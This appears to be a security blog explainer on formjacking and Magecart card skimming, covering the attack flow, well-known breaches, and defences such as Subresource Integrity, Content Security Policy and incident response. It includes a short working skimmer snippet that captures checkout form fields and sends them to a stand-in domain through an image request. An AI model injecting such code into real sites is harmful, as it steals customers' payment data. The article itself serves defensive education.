Cyber Threats #formjacking#Magecart#skimming

Formjacking and Web Skimming: How Payment Data Gets Stolen

Understand formjacking attacks where malicious JavaScript steals credit card data from checkout pages. Learn how Magecart operates and how to defend.

6 min read

Formjacking injects malicious JavaScript into legitimate e-commerce checkout pages to steal payment card data as customers type it. The Magecart group (actually multiple distinct threat actors) has compromised thousands of websites using this technique — including British Airways, Ticketmaster, and Newegg. Customers see a normal checkout experience while their card details are silently sent to attacker servers.

How Formjacking Works

The Basic Attack

  1. Attacker compromises a website (CMS vulnerability, weak admin credentials, supply chain compromise)
  2. Injects a small JavaScript snippet into checkout pages
  3. The script listens to form input events and captures keystrokes
  4. When the form submits, it exfiltrates captured data to an attacker-controlled server
  5. The legitimate payment still processes normally — no indication of theft

A minimal formjacker might look like:

// Obfuscated real-world example (simplified)
document.addEventListener('submit', function(e) {
    var form = e.target;
    var data = {};
    
    // Capture all form fields
    [].forEach.call(form.elements, function(field) {
        if (field.name && field.value) {
            data[field.name] = field.value;
        }
    });
    
    // Exfiltrate to attacker server
    var img = new Image();
    img.src = 'https://cdn.legitimate-looking-domain.com/pixel?' + 
              btoa(JSON.stringify(data));
});

The exfiltration often uses image requests or WebSockets to avoid CORS restrictions and blend in with legitimate tracking pixels.

Supply Chain / Third-Party Scripts

The most insidious variant: attackers compromise a third-party JavaScript library used by many e-commerce sites. One compromise → thousands of sites affected simultaneously.

The British Airways breach (2018, 380,000 card details stolen) was traced to a compromised Modernizr JavaScript library file served from the website’s CDN.

Third-party scripts on a typical e-commerce checkout page:

  • Analytics (Google Analytics, Adobe Analytics)
  • A/B testing tools
  • Customer chat widgets
  • Tag managers (Google Tag Manager)
  • Social media buttons

Any of these is a potential formjacking vector.

Magecart Groups

“Magecart” refers to multiple distinct threat actor groups (Group 1–14+ documented) using different infrastructure and techniques:

  • Group 4: most sophisticated, uses custom obfuscation, steganography to hide code in images
  • Group 6: targeted attacks on high-value retailers
  • Group 12: automated attacks on Magento e-commerce platforms (hence “Magecart” — Magento shopping cart)

Detection

As a User

  • Pay by credit card, not debit: credit cards have better fraud protection
  • Use virtual card numbers: Revolut, Privacy.com, bank-issued virtual cards — single-use card numbers that limit exposure
  • Apply Pay / Google Pay: tokenization means your real card number never reaches the merchant’s code
  • Check statements: review card transactions within 24–48 hours after online purchases

Browser-based detection is limited — the injected script looks like legitimate JavaScript to users.

As a Website Owner

Sub-resource Integrity (SRI): verify third-party scripts haven’t been modified:

<script 
  src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.min.js"
  integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo="
  crossorigin="anonymous">
</script>

If the script is modified, the hash won’t match and the browser refuses to load it.

Content Security Policy (CSP):

Content-Security-Policy: 
  script-src 'self' https://cdn.trusted-partner.com;
  connect-src 'self';
  form-action 'self' https://payment-processor.com;

This prevents injected scripts from loading from unauthorized domains and blocks exfiltration requests to unknown servers.

Real User Monitoring and Script Inventory:

  • Use a Web Application Firewall (Cloudflare, Akamai) with bot detection
  • Maintain an inventory of all JavaScript loaded on checkout pages
  • Alert on any new script or changed script hash in CSP violation reports

Automated Scanning Tools

  • Snyk and Socket.dev: detect compromised npm packages
  • Reflectiz and PerimeterX Code Defender: commercial formjacking detection
  • Website Malware Scanner (Sucuri): free scanning for known malicious scripts

Incident Response for Affected Merchants

If formjacking is discovered:

  1. Immediate: remove the malicious script, change all admin credentials
  2. Scope: determine when injection occurred and how many transactions were affected
  3. Notify: PCI DSS requires notifying acquiring bank and card networks within 24–72 hours
  4. Forensics: preserve server logs, identify infection vector (how did attacker get in?)
  5. PCI Compliance: may require a forensic investigation by a PCI-qualified forensic investigator (QFI)
  6. Customer notification: GDPR/CCPA breach notification obligations typically trigger

For Individual Users: Best Practices

  1. Use virtual cards for online purchases — Privacy.com (US) creates single-use numbers
  2. Apple Pay/Google Pay where available — your real card number never transmitted
  3. Monitor transactions actively — enable SMS or push notifications for all card transactions
  4. Use credit, not debit — credit cards limit fraud liability; debit cards risk bank account access

Formjacking remains a high-volume threat because it’s difficult for users to detect, profitable at scale, and exploits the fragmented trust model of web JavaScript where a site’s security depends on every third-party it includes.

#payment security #skimming #Magecart #formjacking